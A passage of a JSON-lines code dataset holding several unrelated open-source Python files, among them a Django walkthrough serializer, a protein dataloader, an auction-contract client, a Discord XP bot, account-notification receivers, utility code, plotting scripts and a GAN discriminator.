trcustoms.levels.models import Level\nfrom trcustoms.levels.serializers import LevelNestedSerializer\nfrom trcustoms.mails import send_walkthrough_update_mail\nfrom trcustoms.tasks import update_awards\nfrom trcustoms.uploads.serializers import UploadedFileNestedSerializer\nfrom trcustoms.users.serializers import 
UserNestedSerializer\nfrom trcustoms.walkthroughs.consts import WalkthroughStatus, WalkthroughType\nfrom trcustoms.walkthroughs.models import Walkthrough\n\n\nclass WalkthroughAuthorSerializer(UserNestedSerializer):\n picture = UploadedFileNestedSerializer(read_only=True)\n\n class Meta:\n model = UserNestedSerializer.Meta.model\n fields = UserNestedSerializer.Meta.fields + [\n \"picture\",\n ]\n\n\nclass WalkthroughListingSerializer(serializers.ModelSerializer):\n author = WalkthroughAuthorSerializer(\n read_only=True,\n default=serializers.CreateOnlyDefault(\n serializers.CurrentUserDefault()\n ),\n )\n level = LevelNestedSerializer(read_only=True)\n legacy_author_name = serializers.ReadOnlyField()\n\n status = serializers.ReadOnlyField()\n rejection_reason = serializers.ReadOnlyField()\n\n class Meta:\n model = Walkthrough\n fields = [\n \"id\",\n \"level\",\n \"author\",\n \"legacy_author_name\",\n \"status\",\n \"rejection_reason\",\n \"walkthrough_type\",\n \"text\",\n \"created\",\n \"last_updated\",\n ]\n\n\nclass WalkthroughDetailsSerializer(WalkthroughListingSerializer):\n level_id = serializers.PrimaryKeyRelatedField(\n write_only=True, source=\"level\", queryset=Level.objects.all()\n )\n text = CustomCharField(\n validators=[MinLengthValidator(0)], collapse_whitespace=False\n )\n\n class Meta:\n model = Walkthrough\n fields = WalkthroughListingSerializer.Meta.fields + [\n \"level_id\",\n ]\n\n def validate(self, data):\n validated_data = super().validate(data)\n\n author = (\n self.instance.author\n if self.instance\n else self.context[\"request\"].user\n )\n validated_data[\"author\"] = author\n\n walkthrough_type = (\n validated_data.get(\"walkthrough_type\")\n or self.instance.walkthrough_type\n )\n\n level = validated_data.get(\"level\", None)\n if (\n level\n and level.walkthroughs.filter(author=author)\n .filter(walkthrough_type=walkthrough_type)\n .exclude(id=self.instance.id if self.instance else None)\n .exists()\n ):\n raise serializers.ValidationError(\n {\n \"detail\": \"You have already posted a walkthrough \"\n \"of this type for this level.\"\n }\n )\n\n if walkthrough_type == WalkthroughType.LINK:\n validator = URLValidator()\n try:\n validator(validated_data.get(\"text\"))\n except ValidationError:\n raise serializers.ValidationError(\n {\"text\": [\"Enter a valid URL.\"]}\n ) from None\n\n return validated_data\n\n def create(self, validated_data):\n func = super().create\n\n def walkthrough_factory():\n return func(validated_data)\n\n walkthrough = walkthrough_factory()\n walkthrough.save()\n update_awards.delay(walkthrough.author.pk)\n return walkthrough\n\n def update(self, instance, validated_data):\n func = super().update\n\n def walkthrough_factory():\n return func(instance, validated_data)\n\n walkthrough = walkthrough_factory()\n walkthrough.save()\n if walkthrough.status == WalkthroughStatus.APPROVED:\n send_walkthrough_update_mail(walkthrough)\n update_awards.delay(walkthrough.author.pk)\n return walkthrough\n\n\nclass WalkthroughRejectionSerializer(serializers.Serializer):\n reason = CustomCharField(collapse_whitespace=False, max_length=500)\n","repo_name":"rr-/TRCustoms","sub_path":"backend/trcustoms/walkthroughs/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"33550670653","text":"import math\nimport sys\nimport random\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial import KDTree\nimport 
torch\nfrom torch.utils import data\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pad_sequence\n\nsys.path.append('../../../atom3d')\nimport atom3d.shard.shard as sh\n\nPROT_ATOMS = ('C', 'O', 'N', 'S', 'P')\nRES_LABEL = ('LEU', 'ILE', 'VAL', 'TYR', 'ARG', 'GLU', 'PHE', 'ASP', 'THR', 'LYS', \n 'ALA', 'GLY', 'TRP', 'SER', 'PRO', 'ASN', 'GLN', 'HIS', 'MET', 'CYS')\nWEIGHT_P = 1.4\n\nclass ResDel_Dataset(data.IterableDataset):\n def __init__(self, sharded, max_radius=10.0, seed=131313):\n self.sharded = sh.Sharded(sharded, None)\n self.num_shards = self.sharded.get_num_shards()\n self.seed = seed\n self.max_radius = max_radius\n\n def __iter__(self):\n worker_info = torch.utils.data.get_worker_info()\n if worker_info is None: # single-process data loading, return the full iterator\n gen = dataset_generator(self.sharded, range(self.num_shards), \n self.max_radius, shuffle=True)\n\n else: # in a worker process, split workload\n per_worker = int(math.ceil(self.num_shards / float(worker_info.num_workers)))\n worker_id = worker_info.id\n iter_start = worker_id * per_worker\n iter_end = min(iter_start + per_worker, self.num_shards)\n gen = dataset_generator(self.sharded, range(self.num_shards)[iter_start:iter_end],\n self.max_radius, shuffle=True)\n return gen\n\n\nclass AtomEnvironment:\n def __init__(self, pos, label, class_weights):\n self.pos = pos\n self.label = label\n self.class_weights = class_weights\n\n\nclass DataLoader(data.DataLoader):\n r\"\"\"Data loader which merges data objects from a\n :class:`torch_geometric.data.dataset` to a mini-batch.\n Args:\n dataset (Dataset): The dataset from which to load the data.\n batch_size (int, optional): How many samples per batch to load.\n (default: :obj:`1`)\n shuffle (bool, optional): If set to :obj:`True`, the data will be\n reshuffled at every epoch. (default: :obj:`False`)\n follow_batch (list or tuple, optional): Creates assignment batch\n vectors for each key in the list. 
(default: :obj:`[]`)\n \"\"\"\n\n def __init__(self, dataset, batch_size=1, shuffle=False, **kwargs):\n super(DataLoader,\n self).__init__(dataset, batch_size, shuffle,\n collate_fn=custom_collate, **kwargs)\n\n\ndef dataset_generator(sharded, shard_indices, max_radius, shuffle=True):\n \"\"\"\n Generate grids from sharded dataset\n \"\"\"\n\n for shard_idx in shard_indices:\n shard = sharded.read_shard(shard_idx)\n if shuffle:\n groups = [df for _, df in shard.groupby(['ensemble', 'subunit'])]\n random.shuffle(groups)\n shard = pd.concat(groups).reset_index(drop=True)\n\n for e, target_df in shard.groupby(['ensemble', 'subunit']):\n _, subunit = e\n res_name = subunit.split('_')[-1]\n label = RES_LABEL.index(res_name)\n protein = df_to_graph(target_df, subunit, label, max_radius)\n if protein is None:\n continue\n\n yield protein\n\n\ndef df_to_graph(struct_df, chain_res, label, max_radius):\n \"\"\"\n label: residue label (int)\n chain_res: chain ID_residue ID_residue name defining center residue\n struct_df: Dataframe with entire environment\n \"\"\"\n chain, resnum, _ = chain_res.split('_')\n res_df = struct_df[(struct_df.chain == chain) & (struct_df.residue.astype(str) == resnum)]\n if 'CA' not in res_df.name.tolist():\n return None\n CA_pos = res_df[res_df['name']=='CA'][['x', 'y', 'z']].astype(np.float32).to_numpy()[0]\n kd_tree = KDTree(struct_df[['x','y','z']].to_numpy())\n neighbors_pt_idx = kd_tree.query_ball_point(CA_pos, r=max_radius, p=2.0)\n neighbors_df = struct_df.iloc[neighbors_pt_idx].reset_index(drop=True)\n\n atom_pos = neighbors_df[['x', 'y', 'z', 'element']].to_numpy()\n atom_pos[..., :3] = atom_pos[..., :3] - CA_pos\n \n for i in range(len(atom_pos)):\n if atom_pos[i][3] in PROT_ATOMS:\n atom_pos[i][3] = PROT_ATOMS.index(atom_pos[i][3])\n else:\n atom_pos[i][3] = len(PROT_ATOMS)\n\n count_keys = struct_df['resname'].value_counts().keys().to_numpy()\n count_values = struct_df['resname'].value_counts().to_numpy()\n class_weights = torch.zeros(len(RES_LABEL))\n for i, value in enumerate(count_values):\n if count_keys[i] in RES_LABEL:\n class_weights[RES_LABEL.index(count_keys[i])] = 1/(float(value))**WEIGHT_P\n class_weights = F.normalize(class_weights, p=1, dim=0)\n\n return AtomEnvironment(torch.tensor(atom_pos.astype(np.float32)), label, class_weights)\n \n\ndef custom_collate(data_list):\n pos = pad_sequence([atom_env.pos for atom_env in data_list]).permute(1, 0, 2)\n labels = torch.tensor([atom_env.label for atom_env in data_list])\n class_weights = torch.cat([atom_env.class_weights.unsqueeze(-1) for atom_env in data_list], dim=-1).permute(1, 0)\n\n return AtomEnvironment(pos, labels, class_weights)","repo_name":"drorlab/gert","sub_path":"src/atom3d_combined/data/res/res_dataloader.py","file_name":"res_dataloader.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"3598263002","text":"import argparse\nimport json\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom pdo.client.controller.commands.send import send_to_contract\nfrom pdo.client.controller.util import *\nfrom pdo.contract import invocation_request\n\n## -----------------------------------------------------------------\n## -----------------------------------------------------------------\ndef __command_auction__(state, bindings, pargs) :\n \"\"\"controller command to interact with an auction contract\n \"\"\"\n\n parser = argparse.ArgumentParser(prog='auction')\n parser.add_argument('-e', 
'--enclave', help='URL of the enclave service to use', type=str)\n parser.add_argument('-f', '--save-file', help='File where contract data is stored', type=str)\n parser.add_argument('-q', '--quiet', help='Suppress printing the result', action='store_true')\n parser.add_argument('-w', '--wait', help='Wait for the transaction to commit', action='store_true')\n\n subparsers = parser.add_subparsers(dest='command')\n\n subparser = subparsers.add_parser('get_signing_key')\n subparser.add_argument('-s', '--symbol', help='binding symbol for result', type=str)\n\n subparser = subparsers.add_parser('initialize')\n subparser.add_argument('-k', '--key', help='public key of the asset contract', type=str, required=True)\n\n subparser = subparsers.add_parser('prime')\n subparser.add_argument('-a', '--attestation', help='Escrow attestation from the asset ledger', type=invocation_parameter, required=True)\n\n subparser = subparsers.add_parser('submit_bid')\n subparser.add_argument('-a', '--attestation', help='Escrow attestation from the asset ledger', type=invocation_parameter, required=True)\n\n subparser = subparsers.add_parser('get_offered_asset')\n subparser = subparsers.add_parser('cancel_bid')\n subparser = subparsers.add_parser('check_bid')\n\n subparser = subparsers.add_parser('max_bid')\n subparser.add_argument('-s', '--symbol', help='binding symbol for result', type=str)\n\n subparser = subparsers.add_parser('close_bidding')\n\n subparser = subparsers.add_parser('exchange_attestation')\n subparser.add_argument('-s', '--symbol', help='binding symbol for result', type=str)\n\n subparser = subparsers.add_parser('cancel_attestation')\n subparser.add_argument('-s', '--symbol', help='binding symbol for result', type=str)\n\n options = parser.parse_args(pargs)\n\n extraparams={'quiet' : options.quiet, 'wait' : options.wait}\n\n if options.command == 'get_signing_key' :\n message = invocation_request('get-public-signing-key')\n result = send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n if result and options.symbol :\n bindings.bind(options.symbol, result)\n return\n\n if options.command == 'initialize' :\n message = invocation_request('initialize', options.key)\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'prime' :\n assert type(options.attestation) is list\n assert len(options.attestation) == 3\n\n bidinfo = options.attestation[0]\n dependencies = options.attestation[1]\n signature = options.attestation[2]\n message = invocation_request('prime-auction*', bidinfo, dependencies, signature)\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'submit_bid' :\n assert type(options.attestation) is list\n assert len(options.attestation) == 3\n\n bidinfo = options.attestation[0]\n dependencies = options.attestation[1]\n signature = options.attestation[2]\n message = invocation_request('submit-bid*',bidinfo, dependencies, signature)\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'get_offered_asset' :\n message = invocation_request('get-offered-asset')\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'cancel_bid' :\n message = invocation_request('cancel-bid')\n send_to_contract(state, options.save_file, message, 
eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'check_bid' :\n message = invocation_request('check-bid')\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'max_bid' :\n message = invocation_request('max-bid')\n result = send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n if options.symbol :\n bindings.bind(options.symbol, result)\n return\n\n if options.command == 'close_bidding' :\n message = invocation_request('close-bidding')\n send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n return\n\n if options.command == 'cancel_attestation' :\n message = invocation_request('cancel-attestation')\n result = send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n if options.symbol :\n bindings.bind(options.symbol, json.dumps(result))\n return\n\n if options.command == 'exchange_attestation' :\n message = invocation_request('exchange-attestation')\n result = send_to_contract(state, options.save_file, message, eservice_url=options.enclave, **extraparams)\n if options.symbol :\n bindings.bind(options.symbol, json.dumps(result))\n return\n\n## -----------------------------------------------------------------\n## -----------------------------------------------------------------\ndef do_auction(self, args) :\n \"\"\"\n auction -- invoke integer key commands\n \"\"\"\n\n try :\n pargs = self.__arg_parse__(args)\n __command_auction__(self.state, self.bindings, pargs)\n except SystemExit as se :\n return self.__arg_error__('auction', args, se.code)\n except Exception as e :\n return self.__error__('auction', args, str(e))\n\n return False\n\n## -----------------------------------------------------------------\n## -----------------------------------------------------------------\ndef load_commands(cmdclass) :\n setattr(cmdclass, 'do_auction', do_auction)\n","repo_name":"Yeuman/project4","sub_path":"common/crypto/pdo/contracts/auction/integer-key-auction.py","file_name":"integer-key-auction.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39513074320","text":"import os\nimport discord\nfrom discord import app_commands\nfrom config import get_settings\nfrom discord.ext import commands\nfrom discord.ext.commands.context import Context\nfrom discord import Message, Guild\nfrom src.models.user_model import UserModel\n\nfrom src.db.database import db_instance\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nDEBUG = get_settings().DEBUG\nBOT_TOKEN = get_settings().BOT_TOKEN\n\nclass MyClient(commands.Bot):\n async def on_ready(self):\n try:\n synced = await self.tree.sync()\n print(f\"Synced {len(synced)} command(s)\")\n for command in synced:\n print(f\"Command: {command}\")\n except Exception as e:\n print(e)\n exit()\n print(\"------\")\n print(f\"Logged in as {self.user} (ID: {self.user.id})\")\n print(\"------\")\n for guild in self.guilds:\n collection = db_instance.get_collection(str(guild.id))\n print(f\"--- {guild.name} ---\")\n for member in guild.members:\n find = collection.find_one({\"id\": str(member.id)})\n if find is None and not member.bot:\n user = UserModel(member.name, str(member.id))\n collection.insert_one(user.__dict__)\n print(member)\n print(f\"--- end ---\\n\\n\")\n print(\"--- Ready ---\")\n\n async def setup_hook(self):\n for 
extension in cogs:\n await self.load_extension(extension)\n\n async def on_guild_join(self, guild: Guild):\n for channel in guild.text_channels:\n print(channel.name)\n if channel.permissions_for(guild.me).send_messages:\n await channel.send(f\"Olá, {guild.name}, eu sou Jotchua!\")\n break\n\n async def on_message(self, message: Message):\n author = message.author\n if not author.bot:\n collection = db_instance.get_collection(str(message.guild.id))\n user = collection.find_one({\"id\": str(author.id)})\n if user is None:\n user = UserModel(author.name, str(author.id))\n collection.insert_one(user.__dict__)\n else:\n del user[\"_id\"]\n user = UserModel(**user)\n user.add_xp(5)\n collection.update_one({\"id\": str(author.id)}, {\"$set\": user.__dict__})\n await self.process_commands(message)\n\nintents = discord.Intents.default()\nintents.members = True\nintents.message_content = True\ncommand_prefix = [\"jot!\", \"j!\"]\n\ncogs = [\"src.comandos.basic\", \"src.comandos.social\", \"src.comandos.rp\"]\n\nclient = MyClient(intents=intents, command_prefix=command_prefix)\nclient.run(BOT_TOKEN)\n","repo_name":"pedrozle/jotchua-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"} +{"seq_id":"36465976891","text":"import time\n\nfrom django.dispatch import receiver\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom . import models\nfrom . import signals\n\nfrom django_slack import slack_message\nfrom django.core.mail import send_mail\n\n@receiver(signals.revoked_profile)\ndef email_revoked_profile(sender, username, organisation, email, reason, **kwargs):\n send_mail(\n '[majora@climb] Your account has been closed',\n '''You're receiving this email because your %s account (username %s) has been closed.\n\n As a result of this:\n * You will no longer be able to use your Majora account to access data.\n * You will be unable to access CLIMB systems with SSH or upload files with rsync.\n * Any API requests you send will now be rejected.\n\n If you do not believe this should have happened, please contact %s as soon as possible. 
Do not contact the CLIMB team or #account-requests with requests to be reactivated.\n ''' % (settings.INSTANCE_NAME, username, \"the accounts team (%s)\" % settings.MAJORA_ACCOUNT_MAIL if hasattr(settings, \"MAJORA_ACCOUNT_MAIL\") and len(settings.MAJORA_ACCOUNT_MAIL) > 0 else \"your site lead\"),\n None,\n [email],\n fail_silently=True,\n )\n if settings.SLACK_CHANNEL:\n slack_message('slack/blank', {\n }, [{\n \"mrkdwn_in\": [\"text\", \"pretext\", \"fields\"],\n \"title\": \"User profile revoked\",\n \"title_link\": \"\",\n \"text\": \"Access for %s has been revoked\" % (username),\n \"footer\": \"Revocation spotted by Majora\",\n \"footer_icon\": \"https://avatars.slack-edge.com/2019-05-03/627972616934_a621b7d3a28c2b6a7bd1_512.jpg\",\n\n \"fields\": [\n {\n \"title\": \"Metadata\",\n \"short\": False\n },\n {\n \"title\": \"Email\",\n \"short\": True\n },\n {\n \"value\": email,\n \"short\": True\n },\n {\n \"title\": \"Org Code\",\n \"short\": True\n },\n {\n \"value\": organisation,\n \"short\": True\n },\n {\n \"title\": \"Reason\",\n \"short\": True\n },\n {\n \"value\": reason,\n \"short\": True\n },\n ],\n \"ts\": int(time.time()),\n }])\n\n@receiver(signals.new_registration)\ndef recv_new_registration(sender, username, first_name, last_name, organisation, email, **kwargs):\n from django.contrib.auth.models import User, Permission\n perm = Permission.objects.get(codename='can_approve_profiles')\n site_admins = models.Profile.objects.filter(user__user_permissions=perm, institute__name=organisation) # TODO works for users specifically given this perm\n send_mail(\n '[majora@climb] A user has requested access to Majora for your organisation',\n '''You're receiving this email because %s %s has requested a %s account and you are responsible for approving accounts for your organisation.\n Please verify the user and if the request is valid, approve the request from Majora: %s/%s\n ''' % (first_name, last_name, settings.INSTANCE_NAME, settings.SITE_URL if hasattr(settings, \"SITE_URL\") else \"\", reverse('list_site_profiles')),\n None,\n [p.user.email for p in site_admins],\n fail_silently=True,\n )\n if settings.SLACK_CHANNEL:\n slack_message('slack/blank', {\n }, [{\n \"mrkdwn_in\": [\"text\", \"pretext\", \"fields\"],\n \"title\": \"New user registration WAITING for approval by site\",\n \"title_link\": \"\",\n \"text\": \"%s %s (%s) requested account %s to be added\" % (first_name, last_name, organisation, username),\n \"footer\": \"New user spotted by Majora\",\n \"footer_icon\": \"https://avatars.slack-edge.com/2019-05-03/627972616934_a621b7d3a28c2b6a7bd1_512.jpg\",\n\n \"fields\": [\n {\n \"title\": \"Metadata\",\n \"short\": False\n },\n {\n \"title\": \"Email\",\n \"short\": True\n },\n {\n \"value\": email,\n \"short\": True\n },\n {\n \"title\": \"Organisation\",\n \"short\": True\n },\n {\n \"value\": organisation,\n \"short\": True\n },\n {\n \"title\": \"Approvers\",\n \"short\": True\n },\n {\n \"value\": str([\"%s %s\" % (x.user.first_name, x.user.last_name) for x in site_admins]),\n \"short\": True\n },\n ],\n \"ts\": int(time.time()),\n }])\n\n@receiver(signals.new_sample)\ndef recv_new_sample(sender, sample_id, submitter, **kwargs):\n if settings.SLACK_CHANNEL:\n slack_message('slack/blank', {\n }, [{\n \"text\": \"Sample %s uploaded from %s\" % (sample_id, submitter),\n #\"footer\": \"New sample spotted by Majora\",\n #\"footer_icon\": \"https://avatars.slack-edge.com/2019-05-03/627972616934_a621b7d3a28c2b6a7bd1_512.jpg\",\n #\"ts\": int(time.time()),\n 
}])\n\n@receiver(signals.site_approved_registration)\ndef recv_site_approval(sender, approver, approved_profile, **kwargs):\n from tatl.models import TatlPermFlex\n treq = TatlPermFlex(\n user = sender.user,\n substitute_user = None,\n used_permission = \"can_approve_profiles\",\n timestamp = timezone.now(),\n content_object = approved_profile,\n )\n treq.save()\n if settings.SLACK_CHANNEL:\n slack_message('slack/blank', {\n }, [{\n \"mrkdwn_in\": [\"text\", \"pretext\", \"fields\"],\n \"title\": \"New user registration approved by site\",\n \"title_link\": \"\",\n \"text\": \"%s %s (%s) requested account %s to be added\" % (approved_profile.user.first_name, approved_profile.user.last_name, approved_profile.institute.name, approved_profile.user.username),\n \"footer\": \"New user spotted by Majora\",\n \"footer_icon\": \"https://avatars.slack-edge.com/2019-05-03/627972616934_a621b7d3a28c2b6a7bd1_512.jpg\",\n\n \"fields\": [\n {\n \"title\": \"Metadata\",\n \"short\": False\n },\n {\n \"title\": \"User\",\n \"short\": True\n },\n {\n \"value\": approved_profile.user.username,\n \"short\": True\n },\n {\n \"title\": \"Name\",\n \"short\": True\n },\n {\n \"value\": \"%s %s\" % (approved_profile.user.first_name, approved_profile.user.last_name),\n \"short\": True\n },\n {\n \"title\": \"Email\",\n \"short\": True\n },\n {\n \"value\": approved_profile.user.email,\n \"short\": True\n },\n {\n \"title\": \"Organisation\",\n \"short\": True\n },\n {\n \"value\": approved_profile.institute.name,\n \"short\": True\n },\n {\n \"title\": \"Approver\",\n \"short\": True\n },\n {\n \"value\": \"%s %s\" % (approver.first_name, approver.last_name),\n \"short\": True\n },\n ],\n \"ts\": int(time.time()),\n }])\n\n@receiver(signals.activated_registration)\ndef recv_activated_registration(sender, username, email, **kwargs):\n send_mail(\n '[majora@climb] Your access request has been approved',\n '''You're receiving this email because you requested a %s account. Your request has been approved.\n Your username is %s\n\n Please find guidance on using our systems and providing data via: https://docs.covid19.climb.ac.uk/.\n ''' % (settings.INSTANCE_NAME, username),\n None,\n [email],\n fail_silently=False,\n )\n","repo_name":"SamStudio8/majora2","sub_path":"majora2/receivers.py","file_name":"receivers.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"3"} +{"seq_id":"22888072703","text":"import disnake\nfrom disnake.ext import commands\nimport pathlib\nimport os\nfrom permissions import admin_permission_required\n\n\nclass HelpModule(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.command()\n async def help(self, ctx, command_name=None):\n help_embed = disnake.Embed(title=' ', colour=0x00FF80)\n functions = [{'use': 'h.fry {жертва} {на сколько кусочков нарезать}',\n 'desc': '**Хотите кого-то зажарить? 
Приятного аппетита!**'}]\n for command in functions:\n help_embed.add_field(name=command['desc'], value=command['use'], inline=False)\n help_embed.add_field(value='Знания о остальных командах вы должны добыть в бою',\n name='Остальные команды:', inline=False)\n help_embed.set_author(name=self.bot.user.name, icon_url=self.bot.user.display_avatar.url)\n await ctx.send(embed=help_embed)\n\n @commands.command()\n @admin_permission_required\n async def admin_help(self, ctx, command_name=None):\n if command_name is not None:\n help_texts = os.listdir('help_texts')\n if f'{command_name}.txt' in help_texts:\n path = pathlib.Path('help_texts', f'{command_name}.txt')\n with open(path, 'r', encoding='utf-8') as text:\n help_text = ''.join(text.readlines())\n else:\n if command_name in self.bot.all_commands:\n help_text = '`Команда существует, но справка для неё отсутствует`'\n else:\n help_text = '`Команда не найдена`'\n help_embed = disnake.Embed(title=f'Помощь для команды {command_name}', colour=0xFFFFFF,\n description=help_text)\n await ctx.send(embed=help_embed)\n\n else:\n comm = self.bot.all_commands\n help_text = '\\n'.join(comm)\n help_embed = disnake.Embed(title=f'Список команд', colour=0xFFFFFF, description=help_text)\n await ctx.send(embed=help_embed)\n\n\ndef setup(bot):\n bot.add_cog(HelpModule(bot))\n","repo_name":"KapitanN3mo/HorizonBot","sub_path":"extensions/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24133066565","text":"from datetime import timedelta\nimport signal\n\n\nclass TimeoutException(Exception):\n pass\n\n\ndef are_rectangles_overlapping(rect1, rect2):\n \"\"\"Returns `True` if two rectangles are overlapping.\n\n >>> rectangle1 = (0, 0, 10, 10)\n >>> rectangle2 = (0, 10, 20, 20)\n >>> rectangle3 = (11, 11, 20, 20)\n >>> assert are_rectangles_overlapping(rectangle1, rectangle2)\n >>> assert are_rectangles_overlapping(rectangle2, rectangle3)\n >>> assert not are_rectangles_overlapping(rectangle1, rectangle3)\n \"\"\"\n try:\n f1_x1, f1_x2 = rect1[0], rect1[0] + rect1[2]\n f1_y1, f1_y2 = rect1[1], rect1[1] + rect1[3]\n\n f2_x1, f2_x2 = rect2[0], rect2[0] + rect2[2]\n f2_y1, f2_y2 = rect2[1], rect2[1] + rect2[3]\n except (TypeError, IndexError):\n msg = \"Both parameters must be list-like elements with >=4 elements.\"\n raise AttributeError(msg)\n\n op_x1 = f1_x1 <= f2_x1 <= f1_x2\n op_x2 = f2_x1 <= f1_x1 <= f2_x2\n op_x = op_x1 or op_x2\n\n op_y1 = f2_y1 <= f1_y1 <= f2_y2\n op_y2 = f1_y1 <= f2_y1 <= f1_y2\n op_y = op_y1 or op_y2\n\n return op_x and op_y\n\n\nclass timeout(object):\n \"\"\"A context manager designed to abort an action after given amount of\n time. It takes the same arguments as datetime.timedelta class. 
Here's a\n functional example:\n\n >>> import time\n >>> start_time = time.time()\n >>> with timeout(seconds=1): \\\n time.sleep(3)\n >>> end_time = time.time()\n >>> assert (end_time - start_time) < 2\n \"\"\"\n def __init__(self, raise_exception=False, **kwargs):\n self.old_handler = None\n self.raise_exception = raise_exception\n self.seconds = timedelta(**kwargs).seconds\n\n def __enter__(self):\n self.old_handler = signal.getsignal(signal.SIGALRM)\n signal.signal(signal.SIGALRM, self.new_handler)\n signal.alarm(self.seconds)\n\n def __exit__(self, exc_type, exc_value, traceback):\n signal.alarm(0)\n signal.signal(signal.SIGALRM, self.old_handler)\n\n is_timeout = exc_type and exc_type != TimeoutException\n if not self.raise_exception and is_timeout:\n return False\n return True\n\n @staticmethod\n def new_handler(signo, frame):\n raise TimeoutException()\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"nikolaik/printermood","sub_path":"printermood/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"34205596885","text":"#!/usr/bin/env python3\n\nfrom os import environ\n\nif \"NOX\" in environ:\n import matplotlib\n matplotlib.use('Agg')\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nfrom math import log\n\nfilename = sys.argv[1]\n\n# [[(addr, count, age)]]\ndata = []\nper_addr = {}\n\nwith open(filename, \"r\") as f:\n tmp = []\n for line in f.readlines():\n if line.strip() == \"===\":\n data.append(tmp)\n tmp = []\n else:\n split = line.split()\n addr = int(split[0], 16)\n tmp.append((addr, int(split[1]), int(split[2])))\n\n if split[0] not in per_addr:\n per_addr[addr] = [(0, None)]\n\n# Collect info over time per-address\nfor dump in data:\n visited = set()\n for (addr, count, age) in dump:\n per_addr[addr].append((count, age))\n visited.add(addr)\n\n # fill in blanks for the others\n for not_visited in set(per_addr.keys()) - visited:\n per_addr[not_visited].append((0, None))\n\nfig = plt.figure()\n\nbig_array = []\n\nfor addr in sorted(per_addr.keys(), reverse=True):\n data = per_addr[addr]\n counts = [log(d[0]) if d[0] > 1 else d[0] for d in data]\n #counts = [d[0] for d in data]\n counts = np.diff(counts)\n big_array.append(counts)\n #plt.plot(counts, label=addr)\n\nprint(\"processed\")\n\n#LABEL_FREQ=1000\n#labels = list(map(lambda x: hex(x), sorted(per_addr.keys(), reverse=True)))[::LABEL_FREQ]\n\nim = plt.imshow(big_array, cmap = \"Greys\", aspect='auto')\ncbar = plt.colorbar(im)\ncbar.set_label(\"Log Number of accesses\")\n\nplt.ylabel('Huge page Address (sorted)')\nplt.xlabel('Time (# memory accesses, chunks of 1-billion accesses)')\nplt.gca().set_yticklabels(plt.gca().get_yticks(), {'family':'monospace'})\n#plt.yticks(np.arange(0, len(labels)*LABEL_FREQ, LABEL_FREQ), labels)\nplt.yticks([])\n\nax = fig.axes[0]\nax.spines['left'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.spines['bottom'].set_visible(False)\n\nplt.tight_layout()\n\nif \"NOX\" not in environ:\n plt.show()\n\nplt.savefig('{}.png'.format(filename))\n","repo_name":"multifacet/0sim-plotting-scripts","sub_path":"plot-memtrace-by-address.py","file_name":"plot-memtrace-by-address.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71866619603","text":"import numpy as 
np\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nclass MyDiscriminator(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.block = nn.Sequential(\r\n nn.Linear(784,1024,bias=True),\r\n nn.ReLU(),\r\n nn.Dropout(p=0.3),\r\n nn.Linear(1024, 512, bias=True),\r\n nn.ReLU(),\r\n nn.Dropout(p=0.3),\r\n nn.Linear(512, 256, bias=True),\r\n nn.ReLU(),\r\n nn.Dropout(p=0.3),\r\n nn.Linear(256, 1, bias=True),\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, x):\r\n return self.block(x)","repo_name":"yd2333/ML-Practice","sub_path":"model/MyDiscriminator.py","file_name":"MyDiscriminator.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31774821422","text":"from bs4 import BeautifulSoup\nimport requests\n# url=\"https://www.empireonline.com/movies/features/best-movies-2/\"\n\n\nurl=\"http://web.archive.org/web/20200821234542/https://www.empireonline.com/movies/features/best-movies-2/\"\n\nresponse=requests.get(url)\nwebhtml=response.text\n\nsoup=BeautifulSoup(webhtml,\"html.parser\")\n# print(soup.prettify())\nal_muvs=soup.find_all(name=\"h3\",class_=\"title\" )\n# 